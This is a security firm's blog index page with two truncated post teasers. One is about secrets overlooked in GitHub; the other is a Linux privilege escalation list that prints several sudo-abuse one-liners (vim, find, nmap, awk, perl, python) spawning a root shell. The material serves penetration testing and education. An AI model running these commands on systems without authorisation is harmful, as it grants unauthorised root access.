Case Study

Github in the wild

Github in the wild

Github is important Oftentimes sensitive secrets stored in a target’s GitHub environment are overlooked and thus not reported in the tool output due to the limitations of automated scanning (regex, entropy searches, etc.). On the flip slide, too much information can be outputted by automated tools, making it difficult to discern true secrets from a …

Github in the wild Read More »

40 Methods For Privilege Escalation Part 1

40 Methods for Privilege Escalation(Part 1)

Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type:  Abusing Privileged Files Methods:  sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN {system(“/bin/bash”)}’ sudo perl -e ‘exec “/bin/bash”;’ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo less /etc/hosts – …

40 Methods for Privilege Escalation(Part 1) Read More »

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.